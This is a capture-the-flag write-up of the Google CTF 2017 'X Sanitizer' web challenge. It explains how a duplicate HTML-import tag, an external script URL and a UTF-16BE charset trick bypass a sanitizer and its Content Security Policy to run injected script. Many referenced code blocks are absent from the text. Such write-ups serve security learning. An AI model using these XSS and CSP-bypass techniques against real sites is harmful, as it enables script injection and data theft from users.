Google CTF Quals 2017 - The X Sanitizer
We participated as Eat Sleep Pwn Repeat in the qualifications for Google CTF last weekend. As expected, the CTF contained some great challenges, one of them being The X Sanitizer, a medium web challenge.
Let’s get started with an overview of the web app, if you are already familiar with it, you can directly skip to the Exploitation section or look at the final payload.
Overview & Functionality
The web app served as a HTML sanitizer, with which harmful scripts remove themselves according to the authors. The index.html
simply had a text box to input a payload:
Notice that a Content Security Policy header is set to only allow same-origin scripts, objects, etc.
The main.js
simply adds listeners to the buttons and makes an initial call to render()
:
The render()
function then calls sanitize()
with the content of the text box as parameter and adds the sanitized HTML to a div
via the innerHTML
property. The actual interesting bits of the website lie in the sanitizer.js
. It contains two parts, one is the sanitize()
function and the other is logic to intercept fetch requests.
As you can see at [[[ 1 ]]] the sanitize()
function registers the script as a service worker. Then it replaces some unwanted keywords in the HTML and creates an iframe in which it loads the /sandbox?html=XXX
URL, where XXX
is the HTML passed into the sanitize function as parameter. When it receives a message from the iframe it removes the iframe and forwards the message to the callback, i.e. it returns the sanitized HTML.
In [[[ 2 ]]] a fetch()
listener is added to intercept requests and to respond, based on the context. If the requested URL is the sandbox URL, it will return the response at [[[ 2 c ]]], which is the implementation of the sandbox, a simple HTML page:
Here INPUT_HTML is the parameter passed to the sandbox URL, i.e. the HTML passed to sanitize()
. Finally, the X-XSS-Protection
header is set to 0, so that you can’t use Chrome’s XSS auditor to block execution of <script src=sanitize></script>
.
That sanitize script is loaded from /sanitize
, which is served at [[[ 2 a ]]], but only if requested from inside the sandbox. After one second it will post the document.body.innerHTML
of the sandbox to its parent, which in turn will forward it to the main.js
script from the beginning. Furthermore it defines a function remove()
(which simply removes a DOM element from the DOM) and uses this function as a handler for Content Securit Policy violations. Finally, a new CSP header is set, this one will allow scripts from any domain, but nothing else. For example if there is a HTML tag with some inline script, it would violate the CSP and get removed from the DOM.
As we have seen, when in the sandbox, the CSP allows scripts from any origin. However, it will intercept those requests and respond with the script at [[[ 2 b ]]] instead of fetching the real requested script. This replacement script removes the <script>
tag that initiated the request, or if the request did not originate from a script tag, it will remove a <link rel="import">
tag instead.
And finally, if we are not in the sandbox and are not requesting the sandbox, requests are simply passed through at [[[ 2 d ]]].
Now that the functionality is out of the way, we can get to the fun part!
Exploitation
There is two problems we need to solve:
- Get some javascript payload through the sanitizer.
- Bypass the CSP of the main website, as it only allows same-origin scripts.
Sanitizer bypass
If we trigger a CSP violation inside the sandbox, the responsible DOM element will definitely get removed by this line:
There is two ways to not trigger the CSP inside the sandbox when including javascript:
- via external scripts like
<script src=//example.com></script>
. (Remember CSP allows scripts from any origin) - via HTML imports using the
<link rel="import">
tag.
Note: since the sanitized HTML will eventually be added to the DOM via .innerHTML
, script tags would not get executed anyway and be useless to us.
HTML imports are luckily governed by the script-src
CSP directive as well, so doing something like <link rel="import" href="http://example.com/">
will not violate the sandbox CSP. But the <link rel="import">
tags get removed here:
Right? Well not really, querySelector()
matches only one element. By adding an additional <link rel="import">
, we can make sure that the correct one will not get removed:
Using this payload, the sanitized HTML added to the DOM looks like this:
We can therefore include a HTML page, effectively bypassing the sanitizer.
CSP bypass
Outside of the sandbox that won’t work though, since the CSP only allows same-origin scripts. And here I got stuck for a while. I tried to import the /sandbox?html=
page, which changes the CSP to allow cross-domain scripts via the /sanitize
script, but /sanitize
is only served if requested from inside the sandbox, so that didn’t work.
I thought that there must be a way to include a useful script from the same origin. The only point where we control some output is the /sandbox?html=
endpoint. However, it prepends our output with some HTML, so it is not valid javascript. But <script>
tags also take a charset argument, which can force the charset of the script. It turns out, if we parse /sandbox?html=
output as UTF-16BE, the output is a valid (but undefined) javascript identifier. We can therefore simply add a payload like =0;alert(1)
(UTF-16BE encoded) and if we include it, we will see the alert popup!
Unfortunately utf-16be
is one of the filtered keywords:
However, there is a way to bypass it. Using the /sandbox?html=
endpoint once again, we can basically request a page from the same-origin with any HTML we desire. The parameter can be URL encoded, which therefore can be used to bypass the keyword filter. For example, the following payload will import an HTML page containing a custom <meta>
tag:
If you check in Chrome, you can see the imported HTML and the meta tag:
.
Final payload
Replacing the meta tag with something more useful like a <script>
with custom charset results in the following payload:
We have url-encoded one character of utf-16be
to bypass the keyword filter. All that remains now is to replace PAYLOAD
with the UTF-16BE payload. Encoding ASCII strings to UTF-16BE is simple: prepend each character with a null byte. I have used the following payload:
In UTF-16BE it looked like this:
Putting it all together results in the final payload:
Note the double url-encoding. It is necessary since that parameter is in an URL which in turn is a parameter of another URL.
The HTML generated by this payload inside Chrome:
.
My server then received the flag: CTF{no-problem-this-can-be-fixed-by-adding-a-single-if}
I don’t quite understand its meaning, so I’m not sure this was the intended solution :)